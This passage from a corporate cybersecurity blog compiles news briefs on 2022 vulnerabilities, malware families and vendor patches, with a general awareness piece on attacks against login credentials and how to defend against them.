key encryption with SHA256 hashing, generating a unique key for each file. More info →

In our weekly summer compilation with the most relevant and most read contents of the Telefónica Tech blog since the beginning of this year, this time we bring you the 4 posts on cybersecurity that have had the most visits. Read them and dare to find out why. Differences between encryption, hashing, scrambling and obfuscation The first thing to do is to clarify the terms we are dealing with in these readings and, to do so, nothing better than this post where we learn to differentiate between very relevant terms within cybersecurity. Cyber Security Differences between encryption, hashing, encoding and obfuscation June 1, 2022 Where do you place your company on the road to cybersecurity? This post will test your perception of how you see your company in terms of protection against possible attacks. Do you dare? Cyber Security Where is your company on the cybersecurity journey? April 20, 2022 How Lokibot works We go one step further and go up a level with this post where we tell you what Lokibot is and how it works. Cyber Security How Lokibot, the malware used by Machete to steal information and login credentials, works June 29, 2022

Possible link between Raspberry Robin malware and Evil Corp infections The Microsoft Threat Intelligence Center (MSTIC) team has published new information about the Raspberry Robin malware, first detected by the Red Canary team in September 2021 [1]. The main method of spread associated with this family is via infected USB devices, and one of its main features is the use of QNAP NAS devices as Command & Control (C2) servers. In their update, Microsoft experts reportedly discovered that Raspberry Robin, in more advanced stages, is deploying the FakeUpdates malware, traditionally linked to the DEV-0206 actor, on infected networks. However, once FakeUpdates is successfully distributed, the activity observed leads to actions that have traditionally been linked to those carried out by DEV-0243 (Evil Corp) prior to its ransomware infections. In terms of impact, it is worth noting that this malware is reported to have been detected in hundreds of organisations across a multitude of industries. [1] https://redcanary.com/blog/raspberry-robin/ More info: https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/#DEV-0206-DEV-0243 VMware critical security advisory VMware has issued a critical security advisory (VMSA-2022-0021) reporting ten recently detected and patched vulnerabilities. These include a critical vulnerability discovered by VNG Security researcher Petrus Viet and listed as CVE-2022-31656 with a CVSSv3 of 9.8. It is an authentication bypass vulnerability that affects local domain users and could allow an unauthenticated attacker to gain administrator privileges. Regarding the rest of the vulnerabilities, six of them have been catalogued with a "significant" risk (CVE-2022-31658, CVE-2022-31659, CVE-2022-31660, CVE-2022-31661, CVE-2022-31664, CVE-2022-31665, CVE-2022-31665), CVE-2022-31665) and three with "moderate" risk (CVE-2022-31657, CVE-2022-31662, CVE-2022-31663), including remote code execution, privilege escalation and cross-site scripting (XSS) bugs, among others. These bugs affect VMware Workspace ONE Access (Access), VMware Workspace ONE Access Connector (Access Connector), VMware Identity Manager (vIDM), VMware Identity Manager Connector (vIDM Connector), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager products. While VMware is urging that the patches be implemented as soon as possible, it should be noted that no active exploitation has been detected so far. More info: https://www.vmware.com/security/advisories/VMSA-2022-0021.html Vulnerabilities in Apache HTTP Server Multiple vulnerabilities have been discovered in Apache HTTP Server affecting versions prior to 2.4.54. A remote attacker could exploit some of these vulnerabilities to trigger a denial-of-service condition, disclosure of confidential information, cross-site scripting (XSS), or circumvention of security restrictions on the target system. The vulnerability catalogued as CVE-2022-31813 [1] stands out for having a CVSSv3 of 9.8 and its exploitation would allow the evasion of IP-based authentication control by not sending, under certain conditions, X-Forwarder-* headers. It should also be noted that these bugs affect many products that use the Apache server, such as IBM [2] or F5 [3], and it is therefore recommended that Apache HTTP Server is updated as soon as possible following the vendor's instructions. [ 1] https://nvd.nist.gov/vuln/detail/CVE-2022-31813 [2] https://www.ibm.com/support/pages/node/6595149 [3] https://support.f5.com/csp/article/K21192332 More info: https://httpd.apache.org/security/vulnerabilities_24.html Remote code execution vulnerability in DrayTek routers The Trellix Threat Labs team has detected an important remote code execution vulnerability affecting DrayTek routers. Exploitation of the vulnerability, tracked as CVE-2022-32548 - CVSSv3 10.0 [1], would allow the execution of attacks that do not require user interaction, as long as the device's management interface is condivd for network services. If successful, the attacker would gain access to the device's internal resources, completely compromise the device, and even launch attacks within the LAN from the device's own default configuration. The flaw affects the Vigor 3910 along with 28 other DrayTek models that share the same code base and has been patched by the company. Trellix has also published a video [2] detailing the process of exploiting this vulnerability, so it is recommended not to expose the administration interface to the Internet, reset passwords and update the software of the affected devices to the latest version. [1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32548 [2] https://youtu.be/9ZVaj8ETCU8 More info: https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/rce-in-dratyek-routers.html RapperBot: new botnet targeting Linux systems Fortinet security researchers have discovered a new botnet, called RapperBot, that specifically targets Linux systems. This new malware is reportedly based on the original source code of the Mirai botnet but is notable for having unique features that are rare in this type of malware, such as its own Command & Control (C2) protocol. Also unlike Mirai, RapperBot focuses on using brute-force techniques to access SSH servers instead of Telnet, launching tests on lists of credentials downloaded by the malware from its own resources. If it succeeds in gaining access to the server, the bot adds a new SSH key and creates a Cron task that re-adds the user every hour in case an administrator discovers the account and deletes it. It is currently unknown what RapperBot's main purpose may be, as its authors have kept its DDoS functions limited. However, the addition of persistence and detection evasion mechanisms indicate that the botnet's operators may be interested in initial access sales to ransomware actors. More info: https://www.fortinet.com/blog/threat-research/rapperbot-malware-discovery

Continuing with our series of posts on the most read content for each technology, this week we stop at Blockchain to learn more and better about it together with our experts from Telefónica Tech. Here we go! The 7 priorities of a company when adopting Blockchain This technology has been attracting the attention of all companies for some time now. Do you want to know why? Blockchain The 7 priorities of a company when adopting Blockchain October 24, 2022 5 key trends for the massive adoption of Blockchain Yes, it is a reality that the Blockchain has become one of the keys to the technology market and we tell you the best trends for its adoption. BLOCKCHAIN 5 key trends for mass adoption of Blockchain July 28, 2022 Incentives in enterprise blockchain networks: a new approach But this technology does not stop evolving, and new approaches have already arrived. Do you want to be the first to know about them? BLOCKCHAIN Incentives in business blockchain networks: a new approach January 16, 2023

New Critical Vulnerability in SonicWall Products Researchers from DBappSecurity HAT lab have discovered a critical vulnerability that affects several SonicWall Analytics On-Prem and SonicWall Global Management System products. The vulnerability, a SQL injection flaw, has been labelled CVE-2022-22280, with CVSS 9.4, and grants the attacker with access to sensitive information, and the possibility to bypass authentication and delete information from databases. The vulnerability is considered critical given that it does not require authentication, user interaction nor is complex to be exploited. So far, no active exploitation of the flaw has been detected nor any exploits have been found. The vulnerability affects Analytics On-prem versions 2.5.0.3-2520 and prior [1], as well as SonicWall Global Management System versiones 9.3.1-SP2-Hotfix1 and prior [2]. Finally, SonicWall has urged all organizations using these products to install the new security patch as soon as possible. [1] https://www.sonicwall.com/support/knowledge-base/security-notice-sonicwall-analytics-on-prem-sql-injection-vulnerability/220613083254037/ [2] https://www.sonicwall.com/support/knowledge-base/security-notice-sonicwall-gms-sql-injection-vulnerability/220613083124303/ More info: https://www.bleepingcomputer.com/news/security/sonicwall-patch-critical-sql-injection-bug-immediately/ Analysis of new CosmicStrand rootkit Researchers with SecureList have discovered a new advanced rootkit for UEFI firmware for Windows that has received the name CosmicStrand. This type of malware is highly evasive and persistent, as it remains on the victim's system even after several reboots. As per the infection chain, CosmicStrand attacks on kernel level, aiming at firmware images from Gigabyte or ASUS' motherboards. These firmware images are modified in the CSMCORE DXE controller to execute a code chain during system boot that downloads the payload hosted on Windows. According to researchers, the modifications on the firmware images could be achieved by exploiting a vulnerability. This would imply that the attackers had previous access to the victim's computer to extract, modify and overwrite the motherboard's firmware. The countries where this operation is taking place so far are China, Vietnam and Iran. Plus, the victims are normally users with free versions of the products impacted. URL: https://securelist.com/cosmicstrand-uefi-firmware-rootkit/106973/ 0-day vulnerability in PrestaShop exploited against e-commerce stores The exploitation of a 0-day vulnerability has been detected in PrestaShop, the most popular open source e-commerce platform in Europe and Latin America, used by around 300,000 customers worldwide. PrestaShop reported that the attackers were exploiting a combination of vulnerabilities to inject malicious code into websites using its software, allowing them to execute arbitrary code with the purpose of stealing e-commerce customers payment information. Among the exploited flaws, the PrestaShop team detected a SQL injection 0-day (CVE-2022-36408 [1]) that has been fixed in the version 1.7.8.7, however, they state that there may be more methods to carry out this attack. In addition, PrestaShop has published a series of tests to verify the attack, as well as recommendations to keep the e-commerce site secure such as keeping the software updated and disabling the MySQL Smarty Cache function, used by the attackers to carry out the attacks. [1] NVD - CVE-2022-36408 (nist.gov) More info: https://build.prestashop.com/news/major-security-vulnerability-on-prestashop-websites/

Lightning Framework: new malware targeting Linux environments Researchers at Intezer have published information about a new type of malware targeting Linux environments, which they have named Lightning Framework. While the researchers have not located a complete sample and some details of the malware are still unknown, some of its characteristics have been analysed. It is an advanced malware that installs itself on the victim's system via a downloader that will download all its modules and plugins. From there, the malware impersonates the GNOME password manager to connect to a polymorphic Command & Control server and download more components. Other features include the manipulation of timestamps and process IDs, the creation of a script with the name "elastisearch" to create persistence and the implementation of a backdoor by creating its own SSH server. According to Bleeping Computer, Lightning Framework is the latest in a growing wave of malware variants attacking Linux systems, following recent detections of OrBit, Symbiote, BPFDoor and Syslogk. More info → * * * Cisco fixes multiple vulnerabilities Cisco has released security patches to fix 45 vulnerabilities (three critical, one high and 41 medium) affecting various products. Three of the patched flaws, listed as CVE-2022-20857 CVSS 9.8, CVE-2022-20858 CVSS 9.8 and CVE-2022-20861 CVSS 9.8, affected the Cisco Nexus Dashboard datacentre management solution and could allow an unauthenticated remote attacker to execute arbitrary commands and perform actions with root or administrator privileges. Another high-severity flaw, listed as CVE-2022-20860 CVSS 7.4, is also highlighted in the SSL/TLS implementation of Cisco Nexus Dashboard that could allow an unauthenticated remote attacker to alter communications by intercepting traffic in man-in-the-middle attacks. While these flaws are not known to be actively exploited, Cisco is urging users of affected devices to apply the patches as soon as possible. More info → * * * Luna: new ransomware targeting Windows, Linux and ESXi Kaspersky security researchers have discovered a new ransomware family based on the Rust programming language, named Luna, on a ransomware forum on the dark web. This new ransomware appears to have the ability to encrypt devices running various operating systems, including Windows, Linux and ESXi systems. According to Kaspersky experts, at this stage Luna appears to be a simple ransomware in development and, for the time being, limited to command-line options only. However, its encryption scheme is unusual, combining the Diffie-Hellman elliptic curve X25519 secure key exchange, using Curve25519 with the Advanced Encryption Standard (AES) symmetric encryption algorithm. Furthermore, the trend of using a cross-platform language such as Rust denotes the trend of cybercriminal gangs developing ransomware capable of targeting multiple operating systems, without much effort and adaptation for each target. According to the research, there are no known data on possible victims of this ransomware family, as its operators have only recently been discovered and their activity is still being monitored. More info → * * * Atlassian fixes critical flaw in encrypted Confluence credentials Atlassian has released a security update that fixes a critical encrypted credential vulnerability in Confluence Server and Data Center that could allow unauthenticated remote attackers to log into vulnerable servers. The encrypted password is specifically added after installation of the Questions for Confluence application (versions 2.7.34, 2.7.35 and 3.0.2) for an account with the username disabledsystemuser, which is designed to assist administrators with the migration of application data to the Confluence cloud. The disabledsystemuser account is created with an encrypted password and is added to the confluence-users group, which allows viewing and editing all non-restricted pages within Confluence by default. Exploitation of this vulnerability, classified as CVE-2022-26138, would therefore allow an attacker to log in and access any page to which the confluence-users group has access. So far, no active exploitation of this flaw has been observed, and Atlassian claims that this application, which helps improve internal communications, is reportedly installed on more than 8,000 Confluence servers. To patch this bug, it is recommended to upgrade to the fixed versions (2.7.38 or higher to 3.0.5), or disable or delete the disabledsystemuser account, as uninstalling the Questions for Confluence application would not be enough. More info → * * * CloudMensis: New malware targeting macOS ESET researchers have discovered a new malware that is being used to implement backdoors and exfiltrate information on macOS devices. The malware was first detected in April 2022 by the ESET team and has been named CloudMensis. One of its most notable features is the use of cloud storage services such as DropBox, Yandex Disk or pCloud to communicate with its command and control (C2) servers. CloudMensis also manages to execute code on the target system and obtain administrator privileges to execute a second, more functional phase that collects information such as email attachments, screenshots, document exfiltration, keystrokes and other sensitive data. Similarly, it is currently unknown how it is distributed and what the infection vector is, as well as who the end targets of this malware would be and the threat actor to attribute this activity to. More info →

Rozena: backdoor distributed by exploiting Follina vulnerability Fortinet researchers have published an analysis of a malicious campaign in which they have detected the distribution of a new backdoor exploiting the well-known Follina vulnerability (CVE-2022-30190). This new malware has been named Rozena and its main function is to inject a reverse shell into the attacker's host, allowing malicious actors to take control of the victim's system, as well as to enable monitoring and information capture, and/or to maintain a backdoor to the compromised system Regarding the methodology used to carry out the infection, it consists of distributing malicious office documents, which when executed, connect to a Discord URL that retrieves an HTML file that, in turn, invokes the vulnerable Microsoft Windows Support Diagnostic Tool (MSDT), resulting in the download of the payload, in which Rozena is included. More info → * * * Microsoft fixes an actively exploited 0-day Microsoft has published its security bulletin for the month of July in which it fixes a total of 84 vulnerabilities, including one actively exploited 0-day. Out of the total number of detected flaws, 5 correspond to denial of service vulnerabilities, 11 to information disclosure, 4 to omission of security functions, 52 to elevation of privileges, and 12 to remote code execution. Within this last type are the four vulnerabilities classified as critical (CVE-2022-30221, CVE-2022-22029, CVE-2022-22039, CVE-2022-22038), with the rest of the vulnerabilities being of high severity. It is worth noting the 0-day, catalogued as CVE-2022-22047 with a CVSSv3 7.8, discovered by Microsoft Threat Intelligence Center (MSTIC) and Microsoft Security Response Center (MSRC), involves a Windows CSRSS elevation of privilege vulnerability, which could allow an attacker to gain SYSTEM privileges. According to Microsoft, active exploitation of this flaw has been detected [6], although no further details have been provided so far, and it is recommended that patches be applied as soon as possible. Also, CISA has added this vulnerability to its catalogue of actively exploited vulnerabilities. More info → * * * Vulnerability in the authentication of an AWS Kubernetes component Security researcher Gafnit Amiga has discovered several security flaws in the authentication process of AWS IAM Authenticator, a component for Kubernetes used by Amazon Elastic Kubernetes Service (EKS). The flaw lies in incorrect validation of query parameters within the authenticator plugin when configuring the use of the template's "AccessKeyID" parameter within query strings. Exploiting it could allow an attacker to bypass existing protection against replay attacks or obtain the highest permissions in the cluster by impersonating other identities, i.e., escalate privileges within the Kubernetes cluster. According to the researcher, two of the identified flaws have existed since the first release in 2017, while the third, which is the one that allows impersonation, has been exploitable since September 2020. The flaws as a whole have been identified as CVE-2022-2385 and have been given a high criticality. AWS has confirmed that since 28 June all EKS clusters have been updated with a new version of IAM Authenticator that fixes the issue. Customers who manage their own clusters and use the "AccessKeyID" parameter of the authenticator plugin should upgrade to AWS IAM Authenticator for Kubernetes version 0.5.0. More info → * * * VMware fixes vCenter Server vulnerability VMware has recently published a new version of vCenter Server 7.0 3f in which it corrects, eight months later, a vulnerability in the integrated authentication mechanism with Windows discovered by Crowdstrike and with CVE-2021-22048. This flaw can only be exploited from the same physical or logical network as the affected server, and although it is a complex attack, it requires few privileges and no user interaction. However, NIST suggests that it could be exploited remotely. The versions of vCenter Server affected by the vulnerability are 6.5, 6.7 and 7.0. The company has provided mitigation measures for those who are unable to upgrade to the latest patched version by switching to an Active Directory over LDAP authentication model. CVE-2021-22048 also affects WMware Cloud Foundation versions 3 and 4 but has not yet been fixed. More info → * * * Phishing campaign via Anubis Network Portuguese media outlet Segurança Informatica has published details of a new wave of the persistent phishing campaign, which uses the Anubis Network portal to set up its attacks and has been active since March 2022. Affected users, mainly in Portugal and Brazil, receive smishing or phishing messages from financial services where users are forced to enter their phone number and PIN number, only to be redirected to banking pages where they are asked for their login credentials. According to the researchers, the Command & Control server, hosted by Anubis Network, is controlled by around 80 operators. The analysis also shows how Anubis provides facilities for tracking user data, fake domains created to impersonate banks and temporary email addresses that operators can set up for each case. More info →

Kaspersky investigates attacks on industrial control systems Kaspersky researchers have investigated an attack campaign targeting industrial control systems (ICS) of telcos and industrial companies in several countries on the Asian continent. According to the researchers, most of the incidents analysed had as an entry vector the exploitation of the vulnerability catalogued as CVE-2021-26855, which affects Microsoft Exchange servers and allows remote code execution. This campaign began in October 2021 and since then has used the backdoor known as ShadowPad, which masquerades as a legitimate DLL in order to be executed on the infected computer. Once the system is infected, threat actors remotely inject Cobalt Strike beacons and gain control of a building's automation systems, including electricity, fire control, security and more. Once in control of these systems, it is redistributed across the internal network via an account whose credentials have been stolen, gaining access to more internal services and more sensitive and confidential information. Now, the attackers' ultimate targets remain unknown, although it is believed that they may be gathering information. More info → * * * Backdoor targeting governments and organisations around the world discovered Kaspersky security researchers have revealed that threat actors have been using malware, named SessionManager, discovered on Microsoft Exchange servers belonging to government and military organisations in Europe, the Middle East, Asia and Africa. SessionManager is a natively coded malicious module for Microsoft's Internet Information Services (IIS) server that researchers discovered while continuing to search for IIS backdoors similar to Owowa, another malicious IIS module deployed by attackers on Microsoft Exchange Outlook Web Access servers since the late 2020s to steal Exchange credentials. The SessionManager backdoor allows threat actors to maintain persistent, update-resistant and fairly stealthy access to a target organisation's IT infrastructure and gain access to company emails, update malicious access by installing other malware, or secretly manage compromised servers, which can be leveraged as malicious infrastructure. Due to the similarity of the victims and the use of a common OwlProxy variant, researchers believe that the malicious IIS module may have been exploited by the threat actor Gelsemium as part of a global espionage operation. More info → * * * 0-day in Mitel devices used for ransomware attack Researchers at CrowdStrike have analysed an incident in which malicious actors reportedly used an exploit that leverages a 0-day vulnerability, affecting Mitel MiVoice VoIP devices, to distribute ransomware. The security flaw, now identified as CVE-2022-29499 and with a CVSSv3 of 9.8, is due to an error in data validation when performing a diagnostic script, allowing unauthenticated remote attackers to inject commands via specially crafted requests. It should also be noted that the vulnerability is in the Mitel Service Appliance component of MiVoice Connect, used in SA 100, SA 400 and Virtual SA, making it possible for an attacker to perform remote code execution. Although no official patch has been released, Mitel addressed it on 19 April 2022, releasing a fix script for MiVoice Connect versions 19.2 SP3 and R14.x and earlier. The researchers estimate that further ransomware distributions using this entry vector are likely to occur due to this incident, and recommend that the fixes be applied. More info → * * * More than 900,000 Kubernetes instances exposed on the Internet Cyble researchers have conducted an analysis to locate exposed Kubernetes instances on the Internet, using scanning tools and search queries similar to those used by malicious operators. More than 900,000 exposed Kubernetes servers have been detected from this analysis, although not all of these exposed instances are necessarily vulnerable to attack or expose sensitive data. Of the servers, the TCP ports with the highest exposure are "443" with just over one million instances, followed by port "10250" and "6443" respectively. According to Cyble, the vast majority of the exposed instances return the error code 403, indicating that the unauthenticated request is forbidden and cannot be attacked. However, they have detected a small subset of 799 instances that return a status code 200, which is fully accessible to external attackers. Even though the number of vulnerable servers is quite low, only one remotely exploitable vulnerability needs to be discovered for a much larger number of devices to be vulnerable to these attacks. More info → * * * FabricScape: vulnerability in Microsoft Service Fabric Researchers at Unit 42 in Palo Alto have reported a vulnerability in Microsoft Azure Service Fabric that affects containers in the Linux cluster. The flaw, CVE-2022-30137 CVSSv3 7.6, was discovered and reported to the company in early 2022, and affects the tool, which is widely used to host more than a million applications, some of them extremely important. The vulnerability has been named FabricScape and is due to an arbitrary write by race condition flaw in the Data Collection Agent (DCA) component, executed as root in Service Fabric. This would allow an attacker to escalate their privileges to root, take control of the host node and compromise the entire Service Fabric Linux cluster. The vulnerability was resolved with the June patch for Microsoft Azure Service Fabric 9.0 for all users who have automatic updates enabled. If you do not have this feature enabled, it is recommended that you manually upgrade to the latest Service Fabric version. More info →

Microsoft Office 365 and Cloudflare services went down worldwide Multiple web services were interrupted worldwide last Tuesday. The source of these incidents was Microsoft Office 365 on the one hand and Cloudflare on the other. In the early hours of Tuesday morning, many users reported problems accessing Microsoft Office 365 services, including Exchange, Teams and SharePoint; Microsoft reported on its official Twitter account about these problems, and that they were due to the fact that the traffic management infrastructure was not working. Meanwhile, Cloudflare also suffered a massive outage yesterday, affecting well-known websites such as Amazon, Telegram, Twitch, and Gitlab. The origin of this incident was caused by a change in the network configuration as part of an internal project to increase the resilience of its busiest locations, resulting in 19 of its data centres being affected. Both incidents have now been resolved and all services are operating as usual. Read more → Critical vulnerability affecting QNAP NAS devices QNAP has issued a security advisory about a vulnerability affecting its Network Attached Storage (NAS) devices. According to the manufacturer, some of its server models are vulnerable to possible attacks through a critical PHP vulnerability that dates back to three years ago, as long as they are not condivd by default. The vulnerability, identified as CVE-2019-11043 and with a CVSS3 of 9.8, allows remote code execution for PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11. The company indicates that, in order to exploit this vulnerability, both Nginx and PHP-FPM must be installed on the NAS server. If these conditions are met, the flaw will affect the following versions of its operating systems: QTS 5.0.X and later, QTS 4.5.X and later, and the following versions QuTS hero h5.0.x, QuTS hero h4.5.X, QuTSCloud c5.0.x. In addition, QNAP advises customers that patches are currently available for the operating systems QTS 5.0.1.2034 build 20220515 and later and QuTS hero h5.0.0.0.2069 build 20220614 and later. Real more → Quantum: new tool for creating malicious LNK files Cyble researchers have identified a new tool based on the creation of malicious .LNK files that is increasingly being used in the early stages of an attack. The use of .LNK files with malicious code is not new, as they have been used to manipulate legitimate Windows system tools in malware infections such as Emotet, Bumblebee, Qbot and IcedID. Attackers can easily perform techniques such as bypassing user account control or the SmartScreen component, loading multiple payloads via a single .LNK, building HTA and ISO files or executing malware in a delayed fashion, using this new tool, called Quantum. The developers of this tool also point out that the generated files are evaded by the corresponding security solutions. It should also be noted that some versions of Quantum also include exploits for the "dogwalk" vulnerability, and Cyble links its use to the well-known APT Lazarus. Read more → Cisco announces it will not fix vulnerability in Small Business RV routers Cisco has warned users still using Small Business RV routers that the company has no plans to fix a new remote code execution vulnerability, which has been assigned a CVSS of 9.8. The vulnerability, listed as CVE-2022-20825, is the result of insufficient HTTP packet validation on the Small Business: 110W Wireless-N VPN Firewall, RV130 VPN, RV130W Wireless-N Multifunction VPN, and RV215W Wireless-N VPN routers, as long as the remote management web interface is enabled on WAN connections. According to the company, despite the severity of the flaw, there will be no patch or fix for the vulnerability, as these devices are currently out of support, and it has made it clear that the only possible mitigation is to disable the remote management interface. The company has therefore recommended that its users migrate their operation to Cisco Small Business RV132W, RV160 and RV160W routers. Read more → Critical vulnerability in TheHive and Cortex Security firm StrangeBee has issued a security advisory to report a critical authentication bypass vulnerability discovered in TheHive and Cortex. TheHive is an open-source security incident response platform, widely used by companies around the world, while Cortex is an independent scanning engine, also developed by StrangeBee. The vulnerability, which was discovered by Przemysław Mazurek, allows to impersonate any account on the platform, including administrator accounts, as long as the Active Directory (AD) authentication module is enabled and used to authenticate users on these platforms. This is because AD accepts anonymous connections, resulting in the fact that, if someone sends an authentication request for an existing account without passwords via the TheHive/Cortex API, AD's response to the request allows authentication as "anonymous". This vulnerability, which does not yet have an identifier, affects TheHive versions 3 to 5 and Cortex 3, so it is recommended to upgrade to the latest version as soon as possible. Read more →

An access credential is basically a username and password associated with a person and the access permissions granted to that person for an application, service or system. An access credential can also be considered as a user certificate, or any other form or method of authentication for the purpose of providing access to a resource, such as an application or a web page or service. Access credentials are used on a daily basis by all kinds of user profiles, both experts in ICT systems and people unaccustomed to new technologies. This makes them a target for cybercriminals, who also require these credentials to achieve their goals. Crimes aimed at obtaining access credentials are growing every year, with new techniques and mechanisms being implemented to try to obtain them. Access credentials are essential in order to protect an organisation's information and personal data, so it is important to be clear about which attacks are focused on obtaining them and what mechanisms and techniques they employ. Attacks on passwords One of the most common password attacks is brute force, which consists of guessing the password on a trial-and-error basis. This method begins by trying different combinations with personal data, data collected by other means or random data. These types of actions are automated using tools that facilitate the task and search. Dictionary attacks are another type of password attack. They exploit the malpractice of using a word as a password. As in brute force attacks, tools are used to automate the search process. Photo: Mourizal Zativa / Unsplash This cyber-attack uses dictionaries, which are text files containing words and characters commonly used as passwords. There are many dictionaries on the internet, such as the widely used rockyou.txt, dictionary. If the cyber-attack is heavily targeted against a specific person, information about the victim is also usually collected, such as dates of birth, names of family members, pets or places where the victim has lived, etc. And a customised dictionary is created with these and similar combinations to carry out the cyber-attack, taking advantage of the malpractice of using passwords based on personal data or likes and dislikes. What can be done to prevent passwords from being vulnerable to these attacks? Create strong passwords that meet the following guidelines: At least 10 to 12 characters, combining different types of characters (upper case, lower case, numbers and symbols); The following should not be used: Simple words in any language (dictionary words); Personal names, dates, places or personal data; Words that are made up of characters close together on the keyboard; Excessively short words. Avoid using passwords consisting of elements or words that may be public or easily guessable (e.g., name + date of birth); Create stronger and more robust passwords, totally different from others, to access critical services or applications. Common mistakes in the use of passwords Credential stuffing is a weakness that makes it easier for a brute-force or dictionary attack to succeed. Password spraying is the technique of using a large number of stolen passwords (from a security breach) on a group of accounts (e.g., webmail accounts of employees of a company) to see if it can gain access where it is needed. These searches are automated with tools that limit access attempts so as not to notify the alert systems of the site to be breached. Photo: Ed Hardie / Unsplash Here are some actions that can help counter these attacks or to try to make a password less vulnerable to such attacks: Do not reuse passwords under any circumstances, especially those used for access to critical systems. Enable MFA (multiple factor authentication) or 2FA (two-factor authentication) whenever the system being accessed allows it. Consider access using factors other than the 'username/password' itself, such as: Biometric systems such as fingerprint, iris, etc. Cryptographic tokens, by software or hardware Coordinate cards Access by OTP (One time password) Avoid using your corporate account and email to register for non-corporate services. Social engineering Social engineering attacks focused on obtaining passwords employ a variety of different manipulation techniques in order to obtain information to help obtain passwords and in some cases, to obtain credentials directly. Phishing, smishing, vishing and warshipping These types of cyber-attacks mainly take advantage of misinformation and human naivety. They impersonate, by various mechanisms and means, a trusted manager or agent (bank, post office, tax authorities, etc.) in order to request the victim's credentials. To do so, they use different entry vectors such as emails, SMS, calls or devices. Phishing: A technique that consists of sending an e-mail with an urgent or eye-catching subject (banking matters, tax office, post office, etc.). In this message, a link or button is added that leads to a website designed to look very similar to the legitimate website of the entity they claim to be and they request that you enter your credentials to log in. These fake websites will record the credentials entered and pass them to the attackers and redirect the victim to the original website of the spoofed company or organisation. There are several variants of phishing, such as spear-phishing and whaling. Smishing: A technique that consists of a cybercriminal sending an SMS to a user pretending to be a legitimate entity - social network, bank, public institution, etc. - with the same purpose as in the case of phishing. Vishing: A phone call that employs phishing techniques and using social engineering and similar techniques, seeks to obtain the user's credentials, as in phishing and smishing. Warshipping: A technological gift (usually a USB device or similar) infected with malware that, when connected to our systems and elements, will use different mechanisms to obtain credentials and other data and send them to the cybercriminal. It is also feasible to include in this type baiting, where an infected USB device is given away at conferences, conventions, or through websites with pop-up windows, advertised prizes, or other mechanisms. Shoulder surfing This technique consists of spying on the victim as they type in their credentials, either because they are in a public or insecure environment or because of the cybercriminal's skill in perceiving the credentials they type in. In some cases, they gain the user's trust by impersonating technical or trusted personnel, causing the victim to relax and enter credentials without fear. It is therefore advisable to be aware of the environment you are in, being alert to any suspicious activity that may occur around you. Dumpster diving attack This technique aims to obtain information by searching through the victim's trash. They usually look for notes, notebooks, annotations, which give rise to seeing the type of credentials that are used or a credential noted in a note or notebook. The following guidelines are recommended in order to protect against social engineering attacks focused on obtaining credentials: Use common sense and be cautious at all times. Attend digital security awareness and training sessions. The first line of defence is the end user. Avoid clicking on links that arrive via SMS or emails. Banks, for example, do not send SMS of the type used in these attacks. If you want to access these services and websites, do so through the official channels and routes they offer. Use biometric logins and accesses such as facial recognition, fingerprint, etc. Enable 2FA or MFA on all logins where possible. Do not trust gifts from strangers and check them in advance with security software, under secure environments. Do not trust any phone call requesting access credentials. Other attacks on credentials Other cyber-attacks against credentials use malicious software such as keyloggers. A keylogger is a programme that can extract anything typed on the computer infected with this malicious software. Cybercriminals use them in advance by infecting the victim's computer via USB, email or any known attack vector. Another cyber-attack that may be aimed at obtaining credentials is Man in the Middle. This involves intercepting communication between two or more parties, impersonating one or the other as desired, in order to view and obtain information and modify it at will. Once communications have been intercepted, the responses received at either end may have been manipulated or may not have come from the legitimate interlocutor. Therefore, the sender could use various social engineering techniques in these messages, send malicious attachments to install software or use spoofing techniques to steal the victim's passwords.

Hertzbleed. New side-channel attack on AMD and Intel processors Security researchers at several US universities have discovered a new side-channel attack affecting Intel and AMD processors, called Hertzbleed. What is remarkable about this attack is that it could allow an attacker to extract cryptographic keys from remote servers. This is due to the fact that, under certain circumstances, the Dynamic Voltage and Frequency Scaling System (DVFS) of modern x86 architecture processors depends on the data being processed, allowing, on modern processors, the same program to run at a different CPU frequency. Both Intel (CVE-2022-24436) and AMD (CVE-2022-23823) have already identified the vulnerability and issued the corresponding security advisories. According to the researchers who discovered Hertzbleed, neither firm plans to release patches for these flaws. PACMAN. New attack against Mac devices Security researchers at MIT CSAIL have discovered a new attack that could evade Pointer Authentication (PAC) on Apple's M1 processors. PAC is a security mechanism which cryptographically signs certain pointers and allows the operating system to detect and block unexpected changes. If these changes are not detected, they could lead to information leaks or system compromise. This attack would allow threat actors to access the file system and execute arbitrary code on vulnerable Macs. To do so, attackers must first locate an existing memory write/read flaw affecting the software on the victim's Mac device, which would be blocked by PAC and could increase the severity of the flaw by achieving pointer authentication bypass. In addition, it would be necessary to know the PAC value of a particular pointer on the target. This new attack technique was reported to Apple in 2021, along with a proof of concept, although the company indicates that it does not pose an immediate risk to Mac users, as it requires the exploitation of another flaw, and it is not possible to bypass security systems on its own. More info: https://pacmanattack.com/ Citrix fixes two vulnerabilities in ADM Citrix has released a critical security bulletin fixing two vulnerabilities in Citrix Application Delivery Management (ADM). The first flaw, listed as CVE-2022-27511, is due to improper access control, and could allow an attacker to reset the administrator password after a device reboot, allowing SSH access with the default administrator credentials. In addition, Citrix has fixed another security flaw (CVE-2022-27512) that, if successfully exploited, could result in a temporary outage of the ADM license server, causing Citrix ADM to be unable to issue new or renew licenses. Both flaws affect Citrix ADM versions 13.1 before 13.1-21.53 and Citrix ADM 13.0 before 13.0-85.19. The firm urges users to upgrade Citrix ADM server and Citrix ADM agent as soon as possible. Microsoft Exchange servers compromised to deploy BlackCat ransomware The Microsoft 365 Defender threat intelligence team has reported two security incidents where the BlackCat ransomware was deployed. On the one hand, the exploitation of an unpatched Exchange server was detected as an entry vector. After this initial access, the attackers moved through the affected network, stealing credentials and exfiltrating large amounts of information to be used for double extortion. Two weeks after the initial access, the ransomware was deployed. It is worth mentioning that Microsoft has not reported which vulnerability was exploited. Another incident involved the use of compromised credentials on a remote desktop server with internet access as an entry vector, with the attackers subsequently gaining access to passwords and other information, and ultimately implementing the BlackCat payload for data encryption. Office365 feature makes it easy to encrypt files in the cloud Security researchers at Proofpoint have discovered a feature in Office 365 that could allow ransomware operators to encrypt files stored in SharePoint Online and OneDrive, making them unrecoverable without backups or the attacker's decryption key. The researchers have focused on studying these two cloud applications because they are the most widely used in 